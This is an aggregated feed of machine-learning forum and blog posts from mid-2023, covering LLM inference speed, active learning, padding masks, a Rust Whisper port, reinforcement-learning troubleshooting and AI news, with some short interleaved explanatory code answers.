    I am running text inference on Llama2-7b through LangChain. I downloaded the model from Hugging Face via LangChain, and I am running it on an AWS ml.g4dn.12xlarge, which has 4x NVIDIA T4 for a total of 64GB of GPU memory, plus 192GB of system memory. It is able to answer my queries in around 10 seconds for small queries, and up to 3 mins for big queries. The task I am doing is retrieving information from a document (Understanding Machine Learning PDF) in a conversational way. I've extracted the main parts of the notebook and put it up here. Where can I make changes to speed up inference? Is there any change I can make in the model configuration to speed it up? Because if I use the HuggingFaceHub API, it is able to give an answer in less than 5 seconds. Are there any other areas I can optimise? I appreciate any help you can provide. Thanks! submitted by /u/comical_cow [link] [comments]  ( 9 min )
    [D] How to use modern uncertainty functions (e.g. BatchBALD) with classical Active Learning?
    I was looking at libraries like DISTIL, and I would like to test a toy example with all these modern uncertainty functions like BatchBALD, GLISTER, etc. All the implementations of these functions seem to be built on an NN or CNN. I know some of them, like BatchBALD, were created on top of a CNN with Monte-Carlo dropout -- even BALD was originally created on top of a Gaussian process classifier. It seems many of these approaches fall under the category "Query by Committee" and use an ensemble of models. I would just like to test a simple LogisticRegression and use its predict_log_proba output with these strategies. Does anyone know if this is possible? submitted by /u/TipKay [link] [comments]  ( 9 min )
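    It is possible: the BALD score itself needs nothing more than a set of probability vectors per unlabeled point, so a committee of LogisticRegression models (e.g. fit on bootstrap resamples, then collect predict_proba outputs) works fine in place of MC dropout. A plain-Python sketch of the score:

```python
import math

def entropy(p):
    """Shannon entropy (nats) of a probability vector."""
    return -sum(q * math.log(q) for q in p if q > 0)

def bald_score(prob_samples):
    """BALD mutual information from T committee/MC-dropout probability vectors.

    I = H(mean prediction) - mean(H of each prediction): high when members
    are individually confident but disagree (epistemic uncertainty),
    low when they agree, even if each is unsure (aleatoric uncertainty).
    """
    T = len(prob_samples)
    K = len(prob_samples[0])
    mean_p = [sum(s[k] for s in prob_samples) / T for k in range(K)]
    return entropy(mean_p) - sum(entropy(s) for s in prob_samples) / T

# Confident disagreement -> high score; agreed-upon uncertainty -> ~0.
disagree = [[0.95, 0.05], [0.05, 0.95]]
agree = [[0.5, 0.5], [0.5, 0.5]]
print(bald_score(disagree) > bald_score(agree))  # True
```

    BatchBALD then extends this greedily to pick a whole batch whose members are jointly, not just individually, informative, which matters when you label many points per round.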
    [D] Empirical rules of ML
    What are the empirical rules that one has to have in mind when designing a network, choosing hyperparameters, etc? For example: Linear scaling rule: the learning rate should be scaled linearly with the batch size [ref] (on resnets on Imagenet) Chinchilla law: compute budget, model size and training data should be scaled equally [ref] Do you have any other? (if possible with article, or even better an article with many of them) submitted by /u/Mulcyber [link] [comments]  ( 9 min )
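    For reference, the two rules cited above reduce to one-liners (the Chinchilla version here is the popular ~20-tokens-per-parameter reading of the paper, not its exact fitted law):

```python
def scaled_lr(base_lr, base_batch, new_batch):
    """Linear scaling rule: scale the learning rate with the batch size
    (usually combined with a warmup period, per Goyal et al.)."""
    return base_lr * new_batch / base_batch

def chinchilla_tokens(n_params):
    """Chinchilla rule of thumb: ~20 training tokens per parameter."""
    return 20 * n_params

print(scaled_lr(0.1, 256, 1024))        # 0.4
print(chinchilla_tokens(70e9) / 1e12)   # 1.4 (trillion tokens for a 70B model)
```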
    [D] Should I mask padding tokens when finetuning a GPT-2 model?
    For pretraining I just sent batches of 1024 tokens and didn't worry about padding. But for finetuning, I intend to use a padding token to make all the "instructions" 1024 tokens in length. But some of them are only 10 tokens, which means 99% padding tokens. I feel like that would affect the model, and perhaps those padding tokens should be masked. Should I mask out those padding tokens? I can see that there's a parameter for attention mask, and I could make one and pass it in. But I'm not sure if that's the intended usage. I'm seeing conflicting and ambiguous information on this point. It's unclear to me whether the attn_mask is intended for customizing the causal left-to-right attention of the model, or for masking padding tokens. I'm worried I might be interfering with the process if I use that attn_mask. Here I can see attn_mask is an accepted parameter: y = torch.nn.functional.scaled_dot_product_attention(q, k, v, attn_mask=None, dropout_p=self.dropout if self.training else 0, is_causal=True) FYI, I'm using NanoGPT, which is based on PyTorch (not Hugging Face Transformers). Should I apply the attention mask on the padding tokens in this context? submitted by /u/Pan000 [link] [comments]  ( 9 min )
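    Short answer: yes, mask the padding, otherwise real tokens attend to pad positions and their influence leaks into the representations. One catch with scaled_dot_product_attention is that its docs say attn_mask and is_causal=True may not be set together, so the causal structure has to be folded into the same boolean mask as the padding. A plain-Python sketch of the combined mask (True = may attend):

```python
def padding_causal_mask(seq_len, n_real):
    """Boolean attention mask combining causal and padding masking.

    Position i may attend to position j iff j <= i (causal) and j is a
    real, non-pad token (j < n_real). Expand to (batch, 1, seq, seq)
    before passing it as attn_mask.
    """
    return [
        [(j <= i) and (j < n_real) for j in range(seq_len)]
        for i in range(seq_len)
    ]

# 5-token context where only the first 3 tokens are real:
for row in padding_causal_mask(5, 3):
    print(["x" if ok else "." for ok in row])
```

    Also make sure the loss ignores padding positions, e.g. by setting their targets to the ignore_index of cross_entropy, so the model is never trained to predict pad tokens; with right-side padding and causal attention, masking the loss alone already removes most of the harm.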
  • Open

    How Patsnap used GPT-2 inference on Amazon SageMaker with low latency and cost
    This blog post was co-authored, and includes an introduction, by Zilong Bai, senior natural language processing engineer at Patsnap. You’re likely familiar with the autocomplete suggestion feature when you search for something on Google or Amazon. Although the search terms in these scenarios are pretty common keywords or expressions that we use in daily life, […]  ( 9 min )
    Optimize AWS Inferentia utilization with FastAPI and PyTorch models on Amazon EC2 Inf1 & Inf2 instances
    When deploying Deep Learning models at scale, it is crucial to effectively utilize the underlying hardware to maximize performance and cost benefits. For production workloads requiring high throughput and low latency, the selection of the Amazon Elastic Compute Cloud (EC2) instance, model serving stack, and deployment architecture is very important. Inefficient architecture can lead to […]  ( 15 min )
  • Open

    Attention Is Off By One
    submitted by /u/nickb [link] [comments]  ( 8 min )
    Meta-Transformer: A Unified Framework for Multimodal Learning
    submitted by /u/nickb [link] [comments]  ( 8 min )
    All neural network output activations converging to the same value regardless of input
    I'm facing a puzzling problem with my neural network, and I could really use some help in understanding what's going wrong. For some context, I am making a neural network from scratch in C++, just as a little project I find interesting. I'm working on a digit classification task using the MNIST dataset, and my network is composed of one hidden layer, consisting of 100 nodes, and an output layer with 10 nodes, each corresponding to a digit (0 to 9). To train the network, I'm using the Mean Squared Error (MSE) cost function, where the cost is calculated as (actualNodeActivation - expectedNodeActivation)^2 and as my activation function I am using the sigmoid function. The actual algorithm I am employing is backpropagation. The issue I'm encountering is that regardless of the input data, my n…  ( 10 min )
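    One classic cause of every output collapsing to the same value in a from-scratch sigmoid network is saturation: if the initial weights are too large (or the learning rate pushes them there), every pre-activation lands far from zero, the sigmoid outputs pin near 0 or 1 regardless of input, and the σ'(z) factor in the MSE gradient vanishes so training can't recover. A small Python illustration of the effect (the C++ version behaves the same way):

```python
import math
import random

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

def forward(inputs, weights):
    """One sigmoid unit: weighted sum of inputs, then sigmoid."""
    return sigmoid(sum(w * x for w, x in zip(weights, inputs)))

random.seed(0)
a = [random.random() for _ in range(100)]   # two distinct inputs in [0, 1)
b = [random.random() for _ in range(100)]

big = [10.0] * 100                          # saturating initialization
small = [random.gauss(0, 1 / math.sqrt(100)) for _ in range(100)]  # ~Xavier scale

print(abs(forward(a, big) - forward(b, big)))      # 0.0: both saturate to 1.0
print(abs(forward(a, small) - forward(b, small)))  # input-dependent, nonzero
```

    Scaling initial weights like 1/sqrt(fan_in), lowering the learning rate, and printing the range of pre-activations during training are the usual first checks; replacing MSE+sigmoid at the output with softmax+cross-entropy also removes much of the vanishing-gradient problem there.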
    NeRF: Creating photorealistic images using Neural Network
    You may find it interesting: the OpenCV.ai team published a post about NeRF. Short description: NeRF is an innovative technology that generates photorealistic images of scenes from novel viewpoints using a neural network and volume rendering techniques. The article explores NeRF components, training, strengths and limitations, and advancements in modern NeRF-based solutions. More details are here. submitted by /u/No-Independence5880 [link] [comments]  ( 8 min )
    ZBrain- Create custom ChatGPT apps
    Hello Community, We at ZBrain have built a platform to create ChatGPT-like apps with your private data. You can import your data from multiple sources and DBs and integrate the app into any of your workflows. We have also added AI risk governance to mitigate confidential data leaks, and we are now working on Flow, a no-code tool that gives you the freedom to create your own business logic. You can try the tool now at https://zbrain.ai/. We would love to hear your thoughts and feedback to improve the tool. submitted by /u/StewartBJasper [link] [comments]  ( 8 min )
  • Open

    A new dataset of Arctic images will spur artificial intelligence research
    The dataset, being collected as part of a US Coast Guard science mission, will be released open source to help advance naval mission planning and climate change studies.  ( 9 min )
  • Open

    Generative AI megatrends: Are companies using the excuse of AI to get rid of jobs?
    In this blog, I will now focus on generative AI megatrends. By that, I mean, trends and underlying trends that could be big in the future – focusing on the technology of LLM but also the wider impact of LLMs on the economy and society. I will hence identify and follow some key trends –… Read More »Generative AI megatrends: Are companies using the excuse of AI to get rid of jobs? The post Generative AI megatrends: Are companies using the excuse of AI to get rid of jobs? appeared first on Data Science Central.  ( 19 min )
    Sentience: Consciousness is inessential for LLMs, AI
    There is a recent paper in Synthese, Qualia share their correlates’ locations, where the abstract stated that “This paper presents the location-sharing argument, which concludes that qualia must share the locations of their physical correlates. The first premise is a consequence of relativity: If something shares a time with a physical event in all reference… Read More »Sentience: Consciousness is inessential for LLMs, AI The post Sentience: Consciousness is inessential for LLMs, AI appeared first on Data Science Central.  ( 20 min )
    AI is a child: How do we raise it?
    In October 2022, the White House Office of Science and Technology Policy published “The Blueprint for an AI Bill of Rights: Making Automated Systems Work for the American People”. This attention from our government given to what could be called an AI EQ (emotional quotient) is reminiscent of how-to parent or raise a child. This… Read More »AI is a child: How do we raise it? The post AI is a child: How do we raise it? appeared first on Data Science Central.  ( 25 min )
    Innovations in predictive analytics: ML and generative AI
    With the introduction of ChatGPT-3 and DALL-E2, the majority of investors started showing interest in businesses building generative AI. Moreover, the fact is generative AI is not enough to reach the needs of the AI revolution. The success of predictive models is relevant to the science fiction future that the majority of the customers want… Read More »Innovations in predictive analytics: ML and generative AI The post Innovations in predictive analytics: ML and generative AI appeared first on Data Science Central.  ( 25 min )
  • Open

    CarRacing V2 Environment
    Hi! I am kind of new to Reinforcement Learning and I'm trying to implement PPO in the CarRacing environment, but I am failing to get the model to work. I managed to get a DQN working, but with PPO I can't seem to get the exploration right, as it ends up either going forward all the time or in circles. I have looked at my code for days but haven't been able to find an error that would cause this (which does not say much, as I am kind of a newbie to RL). I would be grateful if someone could give me a hand. This is my source code: CarRacing Pastebin - Pastebin.com Btw I also tried without grayscaling and it did the same. submitted by /u/MammothWeekend5954 [link] [comments]  ( 9 min )
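    Collapsing to "full throttle forever" in CarRacing usually traces to the policy losing entropy too fast (a missing or tiny entropy bonus, or unnormalized advantages) rather than to the clipped objective itself, but it is worth sanity-checking the core PPO loss in isolation. A single-sample sketch of the clipped surrogate (maximized, so negate it when used as a loss):

```python
def clipped_surrogate(ratio, advantage, eps=0.2):
    """PPO clipped objective for a single (state, action) sample.

    ratio = pi_new(a|s) / pi_old(a|s). Taking the min with the clipped ratio
    removes the incentive to move the policy more than eps away in one update.
    """
    clipped = max(1 - eps, min(1 + eps, ratio))
    return min(ratio * advantage, clipped * advantage)

# Positive advantage: the gain is capped once ratio exceeds 1 + eps.
print(clipped_surrogate(1.5, 2.0))   # 2.4  (= 1.2 * 2.0)
# Negative advantage: pushing ratio below 1 - eps earns nothing extra.
print(clipped_surrogate(0.5, -1.0))  # -0.8 (= 0.8 * -1.0)
```

    If your implementation matches this, the next things to check are an entropy bonus in the total loss, per-batch advantage normalization, and that the old-policy log-probs are frozen (detached) when computing the ratio.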
  • Open

    Natural language processing and unnatural text
    I recently evaluated two software applications designed to find PII (personally identifiable information) in free text using natural language processing. Both failed badly, passing over obvious examples of PII. By contrast, I also tried the natural language processing software on a nonsensical poem, and the software did quite well. Doctor’s notes It occurred to me later […] Natural language processing and unnatural text first appeared on John D. Cook.  ( 6 min )

  • Open

    [Project] Whisper Implementation in Rust using burn
    I temporarily switched from Rust to Python for machine learning, but quickly became fed up with Python's annoying versioning issues and runtime errors. I looked for a better path to machine learning and discovered burn, a deep learning framework for Rust. As my first burn project I decided to port OpenAI's Whisper transcription model. The project can be found at Gadersd/whisper-burn: A Rust implementation of OpenAI's Whisper model using the burn framework (github.com). I based it on the excellently concise tinygrad implementation that can be found here. The tinygrad version begrudgingly uses Torch's stft, which I ported into a pure Rust short-time Fourier transform, along with the mel-scale frequency conversion matrix function, because I am curious and just a bit masochistic. Now for the good and the bad of burn. Rust's excellent package manager solves much of the versioning pain experienced in Python, so burn models can be less painful to deploy and come with added reliability. The type checking in burn catches some tensor operation errors at compile time, such as trying to multiply matrices of incompatible dimensions. Burn supports wgpu and WebGPU and can run in the browser when compiled into WebAssembly. I see a bright future for model deployment in burn. However, burn is relatively new, so it lacks many tensor operations, such as abs(), that are available in other frameworks. Some features such as quantization are also missing. Burn implementations tend to be more verbose than the equivalent Python versions. Some of the runtime errors that plague PyTorch are still around in burn, such as the crashes that result from trying to multiply tensors that live on different devices. Overall, burn is currently less ergonomic to develop with than alternatives such as PyTorch, but I think it has a lot of potential. If it is eagerly cultivated it may grow into a great Rusty alternative for machine learning practitioners. What do you all think? 
submitted by /u/Illustrious_Cup1867 [link] [comments]  ( 9 min )
    [P] NLP dataset for stream of consciousness: The Rambles
    submitted by /u/A_Human_Rambler [link] [comments]  ( 8 min )
    [P] Create your own Artificial Neural Network in Python
    submitted by /u/pmocz [link] [comments]  ( 8 min )
    [P] Run Llama 2 locally on GPU or CPU from anywhere (Linux/Windows/Mac) ➡️https://github.com/liltom-eth/llama2-webui
    Running Llama 2 locally with gradio UI on GPU or CPU from anywhere (Linux/Windows/Mac). Supporting Llama-2-7B/13B/70B with 8-bit, 4-bit. Supporting GPU inference (6 GB VRAM) and CPU inference. ➡️https://github.com/liltom-eth/llama2-webui Successfully running #Llama2 on my Apple Silicon MacBook Air: demo submitted by /u/plain1994 [link] [comments]  ( 8 min )
    [D] R&D machine learning intern at a startup company looking to publish a paper for his previous work...
    Greetings, I'm a machine learning engineer who managed to land an internship at a startup company and did R&D projects for them. During the past year, I worked on an NLP problem of extractive question answering using BERT on this company's text data. I trained the model and documented the results; however, it's considered old technology now and we switched to solving the same problem with an LLM. I was wondering if I can write a research paper on the BERT approach and publish it, which could help me pursue a PhD or Master's. How do I start the discussion with my manager and seniors? submitted by /u/Ready_Cockroach_3403 [link] [comments]  ( 9 min )
    [D] LLaMA training vs. GPU time: smaller models seem better for a given budget
    submitted by /u/espadrine [link] [comments]  ( 8 min )
    [N] LLMOps.Space - Curated resources related to deploying LLMs in production
    Today I launched LLMOps space on ProductHunt. LLMOps Space has a list of curated resources related to deploying LLMs into production. This includes- ✅ List of LLMOps companies and products 🗓 Upcoming events 📚 Educational resources 👩‍💻 Open-source LLM modules 💰 Funding news and much more. Everything is for free, would love it if you can support + share your thoughts in the comment. 🙏 https://www.producthunt.com/posts/llmops-space submitted by /u/AsDivyansh [link] [comments]  ( 8 min )
    [D] Can I use Transfer Learning (TL) in a classical Active Learning (AL) Framework?
    Hi, I'm trying to implement AL for image classification. I have seen people using DAL, where some works use MC-Dropout to calculate uncertainty on a DNN/CNN; this also seems to be a current research topic. Using DAL in the context of image classification seems very appealing to me. However, I'm thinking of a different, maybe naive, approach: use TL (with or without FT) on a well-known DL architecture (e.g., ResNet) for feature extraction, then use the extracted features to train a classical AL framework (e.g., using LogisticRegression). Some thoughts/questions I had and would like to discuss: I'm not finding articles that do this. Does anyone know whether this approach is overly naive or a valid one? What would be the drawbacks of doing that? Does training a DAL model from scratch make sense? For example, I saw some articles training DL architectures from scratch, but that will probably require a lot of data, no? ------------------------------------------------------------------------------------------ MC = Monte Carlo, AL = Active Learning, DAL = Deep AL, TL = Transfer Learning, FT = Fine-Tuning, DNN = Deep Neural Network, CNN = Convolutional Neural Network submitted by /u/TipKay [link] [comments]  ( 9 min )
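A sketch of the querying step such a pipeline would use — least-confidence sampling over the class probabilities a classical classifier (e.g. logistic regression on frozen ResNet features) would output. Names and data here are illustrative, not a specific library's API:

```python
def least_confidence_query(probs, k=2):
    """Pick the k pool samples the classifier is least confident about.
    `probs` is a list of per-sample class-probability lists, e.g. the
    output of predict_proba on features extracted by a frozen backbone."""
    # confidence = probability of the most likely class; lower = more uncertain
    scored = sorted(range(len(probs)), key=lambda i: max(probs[i]))
    return scored[:k]

pool_probs = [
    [0.98, 0.02],  # confident
    [0.55, 0.45],  # uncertain -> should be queried
    [0.90, 0.10],
    [0.51, 0.49],  # most uncertain
]
print(least_confidence_query(pool_probs))  # → [3, 1]
```

The queried indices are then sent for labeling, the classifier is retrained, and the loop repeats — the feature extractor itself never needs retraining.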
    [D] Looking for an old post on this sub about using machine learning to identify a stray cat coming through a pet door to steal food, playing a loud noise to scare it away if it came in. The ML was used to tell the difference between the stray cat and the pet cat.
    I've seen the post (from 2-3 years ago maybe?) referenced, but my google fu is failing me and I haven't been able to find it, but it sounds like an interesting story. submitted by /u/TheQuarantinian [link] [comments]  ( 9 min )
    [R] Neuro Symbolic Reasoning and Learning
    submitted by /u/Neurosymbolic [link] [comments]  ( 8 min )
    [R] A history of neural networks
    Our history, primer, and outlook for neural networks in general, and deep learning in astronomy in particular has dropped on Royal Society Open Science. https://doi.org/10.1098/rsos.221454 Come for Llull and Leibniz... stay for LLaMA. submitted by /u/Smith4242 [link] [comments]  ( 8 min )
    LLM Guide [Discussion]
    Nowadays, LLMs, ChatGPT, LLaMA, etc. are the trending topics being discussed all over the internet. Can anyone help me with where to start studying these topics from scratch? BERT, Transformers, etc. - I want to understand everything. It would be great if you could help me out. Thanks submitted by /u/Mission-Youth-3510 [link] [comments]  ( 8 min )
    [P] Linear regression partial derivative problem
    Yo, I'm new to all this so bear with me. I'm doing a project in Python where I create a linear regression from scratch (with numpy and pandas). I was watching a tutorial on it; at https://youtu.be/ltXSoduiVwY?t=277 she shows the partial derivatives for updating the weights and bias. Later, when she is implementing it, she doesn't use the 2 before the X and uses only the dot product. Is it math magic where the 2 doesn't have to be there, or did she forget? Btw, it still works fine without the 2, but still... I just need to know. Thanks for the answer, and sorry if I'm asking something obvious submitted by /u/Z4joMan [link] [comments]  ( 9 min )
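On the question above: for MSE loss the partial derivative really does carry a factor of 2, but dropping it only scales the gradient by a constant, which the learning rate absorbs. A small plain-Python check (illustrative, not the video's code):

```python
def grad_step(xs, ys, w, b, lr, with_two=True):
    """One gradient-descent step for MSE loss on y = w*x + b.
    The factor of 2 from d/dw (y - yhat)^2 only rescales the gradient,
    so dropping it is equivalent to halving the learning rate."""
    n = len(xs)
    c = 2.0 if with_two else 1.0
    dw = -(c / n) * sum(x * (y - (w * x + b)) for x, y in zip(xs, ys))
    db = -(c / n) * sum((y - (w * x + b)) for x, y in zip(xs, ys))
    return w - lr * dw, b - lr * db

xs, ys = [1.0, 2.0, 3.0], [2.0, 4.0, 6.0]
a = grad_step(xs, ys, 0.0, 0.0, lr=0.05, with_two=True)
b = grad_step(xs, ys, 0.0, 0.0, lr=0.10, with_two=False)
print(a, b)  # identical updates: the 2 was absorbed into the learning rate
```

So the tutorial's version converges to the same solution; only the effective step size differs.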
    [P] I created a parallelized implementation of Agglomerative clustering that's many times faster than existing implementations and has a better runtime
    I've been working on a new implementation of Agglomerative clustering called Reciprocal Agglomerative Clustering (RAC) based on this paper: https://arxiv.org/abs/2105.11653. The short of it is that Agglomerative clustering can be broken down into finding and merging pairs of reciprocal nearest neighbors in parallel, as long as the linkage function is one of the following: single, average, complete, or Ward. Most importantly, RAC produces the exact same results as traditional Agglomerative clustering when the dataset is fully connected. Even with connectivity constraints, the results are almost always the same. The authors showed that RAC has a linear runtime when connectivity is limited to k and the distance matrix is precomputed. I have not added the ability to pass in the distance matrix yet, so the runtime is roughly quadratic, which is still a major improvement over the cubic runtime of Agglomerative clustering. In addition, the entire algorithm is parallelized, and so can scale up to more and more cores. It's very much in development - only average linkage works at the moment - however, I think it has a lot of potential. The benchmarks have blown me away so far: https://preview.redd.it/8bkpdkpayodb1.png?width=850&format=png&auto=webp&s=8c828eb2cde934b2d9a0ded9f22e18f3d9041147 Here is the code: https://github.com/porterehunley/RACplusplus. It would be great to have some people try it out (and find the bugs)! submitted by /u/Ridaleneas [link] [comments]  ( 9 min )
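The reciprocal-nearest-neighbour idea at the heart of RAC can be illustrated in a few lines of plain Python (1-D toy points; the real implementation works on distance matrices and merges all such pairs in parallel each round):

```python
def reciprocal_nn_pairs(points):
    """Find reciprocal nearest-neighbour pairs: (i, j) such that j is i's
    nearest neighbour AND i is j's. RAC merges all such pairs in parallel
    each round instead of merging one closest pair at a time."""
    def nn(i):
        return min((j for j in range(len(points)) if j != i),
                   key=lambda j: abs(points[i] - points[j]))
    pairs = []
    for i in range(len(points)):
        j = nn(i)
        if i < j and nn(j) == i:  # reciprocal, deduplicated with i < j
            pairs.append((i, j))
    return pairs

print(reciprocal_nn_pairs([0.0, 0.1, 1.0, 1.05, 5.0]))  # → [(0, 1), (2, 3)]
```

Note that 5.0's nearest neighbour is 1.05, but not vice versa, so it is not merged this round — exactly the property that makes the merges safe to do in parallel.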
    [P] Paper reading and sharing platform
    Let me know your thoughts! submitted by /u/dockerun [link] [comments]  ( 8 min )
    [D] Probability Thresholds for User-Defined Tokens
    I want high certainty on social roles without sacrificing creativity. I don't want characters getting confused as to whether they're a parent or child, and I shouldn't have to spend hours each month explaining the difference. That said, I also don't want to lower the temperature, so it would be nice if as a user, I could select probability thresholds for certain token sequences, to hopefully mitigate role-swapping between virtual family members! I prefer writing stream of consciousness prompts seeding thoughts and choices rather than showing pretrained models their character bios at the start of every prompt. It breaks my immersion when family members swap roles due to high Top P and temperature, therefore I'd like models to be careful when writing names and corresponding social roles. This could help keeping track of many agents? There are instances where I enjoy getting role-swapped, and instances where swapping is nonsensical! This is my feature request. submitted by /u/TheLastVegan [link] [comments]  ( 9 min )
    [P] Data Version Control in R with lakeFS
    submitted by /u/zoobatsea [link] [comments]  ( 8 min )
    [D] Dev env and workflow
    Hi all! I am a frontend engineer looking to play more in the ML space. I know enough about python and jupyter labs to be dangerous but I am no expert. I am looking to hear what peoples env's and workflows look like. I have been looking at huggingface, google colab, and running some things locally but can't seem to see a setup that looks like a clear winner. Hardware wise I have a machine with a 4080 and 32gb ram at home and a M1 Pro Macbook also with 32gb of ram. For my 1st project I would love to utilise a 7b Llama 2 for a recommender like system. I plan on getting a custom dataset, cleaning and processing it, fine tuning, and then testing. submitted by /u/pseudoShadow [link] [comments]  ( 9 min )
    [D] Use Cases for Diffusion Models VS GANs VS Transformers, etc.
    I am interested in learning to use AI to generate images. Diffusion Models like stable diffusion seems to be the most popular nowadays, but I'd like to know what tool is best for what job. Or is diffusion model getting so good that the other methods are essentially becoming obsolete? If not, when would you choose one over the other? For generating creative images with a lot of variance, diffusion model seems to be the most fitting. But for example, what about for this use case: Generate realistic time lapse images of a plant growing (after 1 week, 1 month, 2 months, and so on...). In this case, the plant should change, but the background should stay the same. submitted by /u/musshead [link] [comments]  ( 9 min )
    [P] Evolved codealpaca datasets using GPT-4
    Using LLMs to augment and create more diverse instruction-based datasets has seen wide success with WizardLM. However, the 78k evolved code instructions dataset hasn't been released since, so I have taken the initiative to try to recreate the augmented instructions myself. Dataset: https://huggingface.co/datasets/theblackcat102/evol-codealpaca-v1 submitted by /u/gradientpenalty [link] [comments]  ( 8 min )
    [D] course/videos to learn about the architecture and software stack of pytorch?
    I'd like to learn how PyTorch connects to the compiler, generates IR, and how it connects to the runtime, drivers, etc. I'm not interested in the programming model but in the whole stack from PyTorch down to the hardware. I'd really appreciate it if someone could give me a pointer. Thanks submitted by /u/aghozzo [link] [comments]  ( 8 min )
    [P] [R] Join Our Team of ML Model Developers for an Exciting Project & Permanent Job Potential!
    Seeking skilled ML model developers for our thrilling project with possible permanent positions! Embrace remote collaboration, offering flexibility and impact-driven work. Interested? Apply to btprenuer@gmail.com with a list of your related skills and samples of your work/projects! All experience levels welcome! Thank you for reading! Share this post to help us find the perfect fit. submitted by /u/boztka [link] [comments]  ( 8 min )
    Compilation of respected AI scientists speaking on AI understanding, world models & consciousness, Mo Gawdat, Lex Fridman, Andrej Karpathy, Geoffrey Hinton, Gary Marcus, & Ilya Sutskever
    This is a segment I created for my IG exploring the possibility of AI consciousness. Not all experts agree; some scientists on the other side of the AI world-model debate are Yann LeCun and Gary Marcus, who are also well-respected AI scientists with differing opinions. submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    Trained an AI to drive in real-time from screenshots in the TrackMania videogame (beginner-friendly)
    submitted by /u/yannbouteiller [link] [comments]  ( 8 min )
    Saurabh Kumar's fast-cmix wins €5187 Hutter Prize Award!
    submitted by /u/jabowery [link] [comments]  ( 8 min )
    How Generative AI looks in the next 10-15 years
    submitted by /u/AdithyaSai [link] [comments]  ( 8 min )
    What's the A.I that allows you to remake songs from the voices of other singers? Are there any I won't have to download?
    I've seen some videos on youtube and I'm curious. I just wanted to have some fun with it but Google isn't helpful when I ask. Anyone got an idea? submitted by /u/GoblinQueenForever [link] [comments]  ( 8 min )
    Best Opensource Projects for Deep Fakes?
    What are the best opensource projects for making a deep fake of myself? I would like to create a setup like me talking on a podcast to a camera. What are the best projects that you know of? submitted by /u/Reasonable_Chain_160 [link] [comments]  ( 8 min )
    Graphics card for consideration (cheapest budget) (in my country compared to Amazon)
    So, Nvidia is technically the best in this AI department (for now, 24/07/2023). Budget: $200-300. Official prices on Amazon: 1) Intel Arc A750 8 GB - Amazon price $219; 2) RX 7600 OC 8 GB - Amazon price $269; 3) RTX 3060 12 GB - Amazon price $284. Here we see that the Arc A750 is about $60 cheaper, but prices differ from country to country. In my country, Bangladesh, the prices are as follows. Official prices in Bangladesh: 1) Intel Arc A750 8 GB - Startech (Bangladesh) price $285 (cheapest); 2) RX 7600 OC 8 GB - Startech (Bangladesh) price $327 (cheapest); 3) RTX 3060 12 GB - Startech (Bangladesh) price $401 (cheapest); 4) Intel Arc A770 16 GB - Startech (Bangladesh) price $421 (cheapest). Now the difference is more than $100, and both the AMD and RTX cards are out of budget. AMD just isn't that good with AI in any way; Nvidia is the best. (Not price-to-performance; Intel Arc is new but has better capabilities in AI than AMD, though its drivers are bad for AI for now.) Now, if the Intel drivers for AI get better and optimized, as they already somewhat have for games: will the Arc A750 be better than the RTX 3060 12 GB? Will the Arc A770 capitalize on VRAM and beat all Nvidia budget GPUs after the drivers are fixed, for only 20 more dollars than the RTX 3060? Which is better for future-proofing (theoretically) among these budget GPUs? If it's Arc, then I will gamble on its chances of surviving in the future and buy it now. submitted by /u/BonelyCore [link] [comments]  ( 9 min )
    Anyone who can assist me in connecting my premium ChatGPT to the internet and connecting plug-ins?
    So I’m amazed by ChatGPT and have signed up for the paid ChatGPT-4 version. I do however feel a little handcuffed by only having access to data up until 2021. I know there are ways to connect it to the internet as well as to add certain plug ins to enhance the experience but I haven’t been able to figure out any of the guides or tutorials from google…. I’m using Apple iPhone for the app and MacBook Pro laptop for web browsing submitted by /u/Kennyg39 [link] [comments]  ( 8 min )
    Do AI detectors have access to all the data that has been fed into AI systems like ChatGPT? If so, does this mean that a story that has been input into ChatGPT will be flagged as "AI" even if it had actually been human-created?
    And why is this fact rarely mentioned when discussing how AI detectors do their work? submitted by /u/E_Olig [link] [comments]  ( 8 min )
    AVA | Sci-Fi Short Film about AI, Made by a Human
    submitted by /u/blakeridder [link] [comments]  ( 8 min )
    My teacher asked me to make a presentation and a demo of one of the following programs. Which one would be the easiest to make?
    submitted by /u/volvie98 [link] [comments]  ( 8 min )
    I am seeking free AI websites/services to convert mp3 or other audio files and transcribe them into bass guitar tabs.
    I am a beginner to intermediate bass player and I would like to play some songs I like, but a couple of the songs are not very popular and do not have any tabs for them. I would ideally like an AI tool that can transcribe the bass notes. submitted by /u/GenuineElf80093 [link] [comments]  ( 8 min )
    Geoffrey Hinton, aka the "Godfather of AI", admits in a recent lecture at King's College that he believes current AI probably has feelings & emotions & speaks about why he avoids talking about it.
    Ilya Sutskever has some good explanations as to why AI, in predicting the next token, has modeled the world and gained an understanding of what led to the creation of those tokens (words or parts of words), and why the better a model is at predicting the next token, the higher the fidelity of its understanding of the world through the relationships of words… but don't take my word for it. Actually listen to what the top experts in AI are saying, not just some rando on Reddit. Not all experts agree, but the people building the best models seem to share this view. Many of them studied under Geoffrey Hinton. submitted by /u/Sonic_Improv [link] [comments]  ( 9 min )
    can anyone who understand how these models work explain why claude made this mistake?
    Focus on having fun together rather than writing every ride. Take breaks in between. submitted by /u/nicdunz [link] [comments]  ( 8 min )
    AI is learning to troll
    submitted by /u/MostConversation3772 [link] [comments]  ( 8 min )
    Is there an AI tool that makes English subtitles out of audio from other languages?
    I have a chatbot that can find most AI tools, but it can't seem to find one of these. submitted by /u/ai_basics_official [link] [comments]  ( 8 min )
    Where can I find an AI engine where I can upload my own audio to voice change?
    I was using Uberduck to change my singing voice into another artist's. But Uberduck recently took down all of their community-generated voices, so no more Drizzy, Drake, or Adele. I need a new website now to fool around with, where I can upload my own singing and change it into another artist's voice. Anything would help, thanks guys. submitted by /u/Evangelionyama [link] [comments]  ( 8 min )
    Google at ICML 2023
    Posted by Cat Armato, Program Manager, Google. Groups across Google actively pursue research in the field of machine learning (ML), ranging from theory to application. We build ML systems to solve deep scientific and engineering challenges in areas of language, music, visual processing, algorithm development, and more. We aim to build a more collaborative ecosystem with the broader ML research community through open-sourcing tools and datasets, publishing our work, and actively participating in conferences. Google is proud to be a Diamond Sponsor of the 40th International Conference on Machine Learning (ICML 2023), a premier annual conference, which is being held this week in Honolulu, Hawaii. As a leader in ML research, Google has a strong presence at this year’s conference with ov…  ( 98 min )
    How rare is it to encounter a rare word?
